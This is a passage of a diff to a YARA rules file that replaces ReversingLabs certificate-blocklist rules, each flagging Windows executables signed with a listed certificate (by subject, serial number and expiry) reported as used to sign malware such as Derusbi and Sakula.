i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "D-LINK CORPORATION" and pe.signatures[i].serial=="50:67:33:96:14:c5:cc:21:9c:48:9d:40:42:0f:3b:f9" and 1441238400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_A03Ea3A4Fa772B17037A0B80F1F968Aa : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_6E32531Ae83992F0573120A5E78De271 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "cbc0c6ca-fab2-531e-b368-4d3fdc72509f" + id = "37fc58ea-63d4-569d-968f-f4775403b0bb" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7806-L7824" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e2044c6ddb80f3add13dfc3b623d0460ce8e9a66c5a98582f80d906edbbbd829" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1852-L1868" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2b6d54ea8395c3666906b2e60c30b970c2c1b6f55ded874cbcc22dc79391fb34" score = 75 quality = 90 tags = "INFO, FILE" @@ -11262,22 +31053,22 @@ rule REVERSINGLABS_Cert_Blocklist_A03Ea3A4Fa772B17037A0B80F1F968Aa : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DREVOKAPITAL, s.r.o." and (pe.signatures[i].serial=="00:a0:3e:a3:a4:fa:77:2b:17:03:7a:0b:80:f1:f9:68:aa" or pe.signatures[i].serial=="a0:3e:a3:a4:fa:77:2b:17:03:7a:0b:80:f1:f9:68:aa") and 1608076800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "3 AM CHP" and pe.signatures[i].serial=="6e:32:53:1a:e8:39:92:f0:57:31:20:a5:e7:8d:e2:71" and 1451606399<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_333Ca7D100B139B0D9C1A97Cb458E226 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_6967A89Bcf6Efef160Aaeebbff376C0A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c2c32499-4b0d-51ad-a10e-1ddd7218df84" + id = "d6714f50-600b-5437-8be6-097f7dd93dc7" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7826-L7842" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b3a31a54132fd8ca2c11b7806503207a4197f16af78693387bac56879b5e1448" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1870-L1886" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "deb7465e453aa5838f81e15e270abc958a65e1a6051a88a5910244edbe874451" score = 75 quality = 90 tags = "INFO, FILE" @@ -11287,22 +31078,22 @@ rule REVERSINGLABS_Cert_Blocklist_333Ca7D100B139B0D9C1A97Cb458E226 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FSE, d.o.o." and pe.signatures[i].serial=="33:3c:a7:d1:00:b1:39:b0:d9:c1:a9:7c:b4:58:e2:26" and 1608076800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Chang Yucheng" and pe.signatures[i].serial=="69:67:a8:9b:cf:6e:fe:f1:60:aa:ee:bb:ff:37:6c:0a" and 1451174399<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_9245D1511923F541844Faa3C6Bfebcbe : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7473D95405D2B0B3A8F28785Ce6E74Ca : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7d4033b8-da1d-55f5-aa80-f96636650633" + id = "7f44b9d8-917b-5fc4-9651-cce89358e415" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7844-L7862" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b965e897b42c39841e663cc144cf6e4a81fc9bcb64ce3a15a7ca021e95866b08" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1888-L1904" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e15b990b13617017ca2d1f8caf03d8ff3785ca9b860bf11f81af5dadf17a9be5" score = 75 quality = 90 tags = "INFO, FILE" @@ -11312,22 +31103,22 @@ rule REVERSINGLABS_Cert_Blocklist_9245D1511923F541844Faa3C6Bfebcbe : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LEHTEH d.o.o., Ljubljana" and (pe.signatures[i].serial=="00:92:45:d1:51:19:23:f5:41:84:4f:aa:3c:6b:fe:bc:be" or pe.signatures[i].serial=="92:45:d1:51:19:23:f5:41:84:4f:aa:3c:6b:fe:bc:be") and 1607040000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Dmitrij Emelyanov" and pe.signatures[i].serial=="74:73:d9:54:05:d2:b0:b3:a8:f2:87:85:ce:6e:74:ca" and 1453939199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2888Cf0F953A4A3640Ee4Cfc6304D9D4 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_04F380F97579F1702A85E0169Bbdfd78 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "75ec52c5-4c59-51d8-bd9b-928c75d3521a" + id = "860027ff-2df2-5519-afde-60ebee270290" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7864-L7880" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a9ee8534d89b8ac8705bb1777718513a28e4531ed398f482f46a72f2760af161" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1906-L1922" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "73dc6e36fdaf5c80b33f20f2a9157805ce1d0218f3898104de16522ee9cfd51b" score = 75 quality = 90 tags = "INFO, FILE" @@ -11337,22 +31128,22 @@ rule REVERSINGLABS_Cert_Blocklist_2888Cf0F953A4A3640Ee4Cfc6304D9D4 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Lotte Schmidt" and pe.signatures[i].serial=="28:88:cf:0f:95:3a:4a:36:40:ee:4c:fc:63:04:d9:d4" and 1608024974<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "GRANIFLOR" and pe.signatures[i].serial=="04:f3:80:f9:75:79:f1:70:2a:85:e0:16:9b:bd:fd:78" and 1454889599<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_C8Edcfe8Be174C2F204D858C5B91Dea5 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_04D6B8Cc6Dce353Fcf3Ae8A532Be7255 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "92baa26f-1352-53ed-bb9f-0a632e471dd5" + id = "937dd780-52f7-5f27-ac2e-a0245997d449" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7882-L7900" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b3e6927abfce69548374bfd430a3ae3a1c5a8d05f0f40e43091b4d12025c5b1a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1924-L1940" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a316ad7f554428d02a850fb3bb04f349d30ecd2ccd4597e7a63461bf5e866e6f" score = 75 quality = 90 tags = "INFO, FILE" @@ -11362,22 +31153,22 @@ rule REVERSINGLABS_Cert_Blocklist_C8Edcfe8Be174C2F204D858C5B91Dea5 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Paarcopy Oy" and (pe.signatures[i].serial=="00:c8:ed:cf:e8:be:17:4c:2f:20:4d:85:8c:5b:91:de:a5" or pe.signatures[i].serial=="c8:ed:cf:e8:be:17:4c:2f:20:4d:85:8c:5b:91:de:a5") and 1608076800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MADERA" and pe.signatures[i].serial=="04:d6:b8:cc:6d:ce:35:3f:cf:3a:e8:a5:32:be:72:55" and 1451692799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_9Faf8705A3Eaef9340800Cc4Fd38597C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_191322A00200F793 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d2988928-4ef3-56bf-a407-f735756c7f81" + id = "4011e54c-ca28-536f-8759-077fcce6d45f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7902-L7920" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "66a340f169e401705ba229d2d4548cef1a57bf1d2d320b108d12b2049b063b92" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1942-L1958" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1b816785f86189817c124636e50a0f369ec85cfd898223c4ba43758a877f1cf3" score = 75 quality = 90 tags = "INFO, FILE" @@ -11387,22 +31178,22 @@ rule REVERSINGLABS_Cert_Blocklist_9Faf8705A3Eaef9340800Cc4Fd38597C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Tekhnokod LLC" and (pe.signatures[i].serial=="00:9f:af:87:05:a3:ea:ef:93:40:80:0c:c4:fd:38:59:7c" or pe.signatures[i].serial=="9f:af:87:05:a3:ea:ef:93:40:80:0c:c4:fd:38:59:7c") and 1605744000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PRABHAKAR NARAYAN" and pe.signatures[i].serial=="19:13:22:a0:02:00:f7:93" and 1442966399<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0940Fa9A4080F35052B2077333769C2F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_451C9D0B413E6E8Df175 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "358391b7-649b-5792-b4bd-d97b388c5d12" + id = "adc832c0-166d-52d1-aeec-2fc92ff52d02" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7922-L7938" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "45636ea33751fea61572539fe6f28bccd05df9b6b9e7f2d77bb738f7c69c53a2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1960-L1976" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7c94d87f79c9add4d7bf2a63d0774449319aa56cbc631dd9b0f19ed9bb9837d4" score = 75 quality = 90 tags = "INFO, FILE" @@ -11412,22 +31203,22 @@ rule REVERSINGLABS_Cert_Blocklist_0940Fa9A4080F35052B2077333769C2F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PROFF LAIN, OOO" and pe.signatures[i].serial=="09:40:fa:9a:40:80:f3:50:52:b2:07:73:33:76:9c:2f" and 1603497600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PRASAD UPENDRA" and pe.signatures[i].serial=="45:1c:9d:0b:41:3e:6e:8d:f1:75" and 1442275199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Ea720222D92Dc8D48E3B3C3B0Fc360A6 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_03943858218F35Adb7073A6027555621 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8415406b-ede8-5404-8208-34eb649f7325" + id = "fbaf4c7a-5f20-57f7-b6b7-143fdbf0e5c2" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7940-L7958" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c60e1ccf178f03f930a3bc41e9a92be20df0362f067ed1fcfc7c93627a056d75" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1978-L1994" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "93369d51b73591559494a48fafa5e4f7d46301ecaa379d8de70a70ac4d2d2728" score = 75 quality = 90 tags = "INFO, FILE" @@ -11437,22 +31228,22 @@ rule REVERSINGLABS_Cert_Blocklist_Ea720222D92Dc8D48E3B3C3B0Fc360A6 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CAVANAGH NETS LIMITED" and (pe.signatures[i].serial=="00:ea:72:02:22:d9:2d:c8:d4:8e:3b:3c:3b:0f:c3:60:a6" or pe.signatures[i].serial=="ea:72:02:22:d9:2d:c8:d4:8e:3b:3c:3b:0f:c3:60:a6") and 1608640280<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RuN APps FOrEver lld" and pe.signatures[i].serial=="03:94:38:58:21:8f:35:ad:b7:07:3a:60:27:55:56:21" and 1480550399<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4743E140C05B33F0449023946Bd05Acb : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_09813Ee7318452C28A1F6426D1Cee12D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f783bad3-f350-5a74-8e3f-5b7220e4de8f" + id = "db3c1992-b6a1-5aaf-ae3a-c626b531529a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7960-L7976" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "69ce1512d7df4926ee2b470b18fbe51a2aa81e07b37b2536617d6353045e0d19" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1996-L2012" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "89eb019192f822f9fe070403161d81e425fb8acdbc80e55fa516b5607eb8f8c7" score = 75 quality = 90 tags = "INFO, FILE" @@ -11462,22 +31253,22 @@ rule REVERSINGLABS_Cert_Blocklist_4743E140C05B33F0449023946Bd05Acb : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "STROI RENOV SARL" and pe.signatures[i].serial=="47:43:e1:40:c0:5b:33:f0:44:90:23:94:6b:d0:5a:cb" and 1607644800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Saly Younes" and pe.signatures[i].serial=="09:81:3e:e7:31:84:52:c2:8a:1f:64:26:d1:ce:e1:2d" and 1455667199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_A496Bc774575C31Abec861B68C36Dcb6 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_476Bf24A4B1E9F4Bc2A61B152115E1Fe : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing Derusbi malware." author = "ReversingLabs" - id = "51941c0d-a7a1-5c17-bef8-290e5db66fb7" + id = "a41e8196-f5ad-5046-82ac-38c6fe753bdb" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7978-L7996" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f82214f982c9972e547f77966c44e935e9de701cc9108ceca34a4fede850d243" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2014-L2030" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0ec0f44d2a7a53ad5653334378b631abde1834ebfcf72efcdcce353c6b9ae17d" score = 75 quality = 90 tags = "INFO, FILE" @@ -11487,22 +31278,22 @@ rule REVERSINGLABS_Cert_Blocklist_A496Bc774575C31Abec861B68C36Dcb6 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ORGLE DVORSAK, d.o.o" and (pe.signatures[i].serial=="00:a4:96:bc:77:45:75:c3:1a:be:c8:61:b6:8c:36:dc:b6" or pe.signatures[i].serial=="a4:96:bc:77:45:75:c3:1a:be:c8:61:b6:8c:36:dc:b6") and 1606867200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Wemade Entertainment co.,Ltd" and pe.signatures[i].serial=="47:6b:f2:4a:4b:1e:9f:4b:c2:a6:1b:15:21:15:e1:fe" and 1414454399<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0A55C15F733Bf1633E9Ffae8A6E3B37D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7Bd55818C5971B63Dc45Cf57Cbeb950B : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing Derusbi malware." author = "ReversingLabs" - id = "32cefe84-b305-5542-a5d3-1832dcbf6d61" + id = "9269cc5c-039e-5d98-ac13-c7b99606e7fa" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7998-L8014" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "89ca9f1c5cf0b029748528d8c5bb65f89ee05877bfdc13b4ce3d2d3e7feafb5d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2032-L2048" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5aa41a2d6a86a30559b36818602e1bdf2bfd38b799a4869c26c150052d6d788c" score = 75 quality = 90 tags = "INFO, FILE" @@ -11512,22 +31303,22 @@ rule REVERSINGLABS_Cert_Blocklist_0A55C15F733Bf1633E9Ffae8A6E3B37D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Osnova OOO" and pe.signatures[i].serial=="0a:55:c1:5f:73:3b:f1:63:3e:9f:fa:e8:a6:e3:b3:7d" and 1604016000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "XL Games Co.,Ltd." and pe.signatures[i].serial=="7b:d5:58:18:c5:97:1b:63:dc:45:cf:57:cb:eb:95:0b" and 1371513599<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_C650Ae531100A91389A7F030228B3095 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4C0B2E9D2Ef909D15270D4Dd7Fa5A4A5 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing Derusbi malware." author = "ReversingLabs" - id = "5d506480-96ca-5e71-9fb2-185b2f8ddc6c" + id = "97005464-1219-56d7-bd5c-f047558be1dc" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8016-L8034" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "186b66283491cfebcaade57b1010ce4304c08ddb131153984210c2c7025961aa" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2050-L2066" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9c74eb025bb413503b97ffdba6f19eadecf3789ce3a5d5419f84e32e25c9b5b1" score = 75 quality = 90 tags = "INFO, FILE" @@ -11537,22 +31328,22 @@ rule REVERSINGLABS_Cert_Blocklist_C650Ae531100A91389A7F030228B3095 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "POKEROWA STRUNA SP Z O O" and (pe.signatures[i].serial=="00:c6:50:ae:53:11:00:a9:13:89:a7:f0:30:22:8b:30:95" or pe.signatures[i].serial=="c6:50:ae:53:11:00:a9:13:89:a7:f0:30:22:8b:30:95") and 1606089600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Fuqing Dawu Technology Co.,Ltd." and pe.signatures[i].serial=="4c:0b:2e:9d:2e:f9:09:d1:52:70:d4:dd:7f:a5:a4:a5" and 1372118399<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3990362C34015Ce4C23Ecc3377Fd3C06 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_5E3D76Dc7E273E2F313Fc0775847A2A2 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing Sakula and Derusbi malware." author = "ReversingLabs" - id = "453b5da2-ae26-5005-8a56-1105a960fde6" + id = "93707307-a250-526d-a3d4-32ed5d2a63a6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8036-L8052" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0625800fcb166b56cab2e16d0d757983a6f880b68627ed8c3c38419dd9a32999" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2068-L2084" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b943057fc3e97cfccadb4b8f61289a93b659aacf2a40217fcf519d4882e70708" score = 75 quality = 90 tags = "INFO, FILE" @@ -11562,22 +31353,22 @@ rule REVERSINGLABS_Cert_Blocklist_3990362C34015Ce4C23Ecc3377Fd3C06 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RZOH ApS" and pe.signatures[i].serial=="39:90:36:2c:34:01:5c:e4:c2:3e:cc:33:77:fd:3c:06" and 1606780800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "NexG" and pe.signatures[i].serial=="5e:3d:76:dc:7e:27:3e:2f:31:3f:c0:77:58:47:a2:a2" and 1372723199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_121Fca3Cfa4Bd011669F5Cc4E053Aa3F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_47D5D5372Bcb1562B4C9F4C2Bdf13587 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing Sakula malware." author = "ReversingLabs" - id = "ebc47e1e-e6fe-581c-86b3-22e2e67a0b81" + id = "d888478e-3883-5d9d-a2b3-d59b57409b8d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8054-L8070" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1edd5be3f970202be15080cd7ef19c0cce7fcba73cb6120d7cb7d518e877cf85" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2086-L2102" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fb4994647a2ed95c73625d90315c9b6deb6fb3b81b4aa6e847b0193f0a76650c" score = 75 quality = 90 tags = "INFO, FILE" @@ -11587,22 +31378,22 @@ rule REVERSINGLABS_Cert_Blocklist_121Fca3Cfa4Bd011669F5Cc4E053Aa3F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in 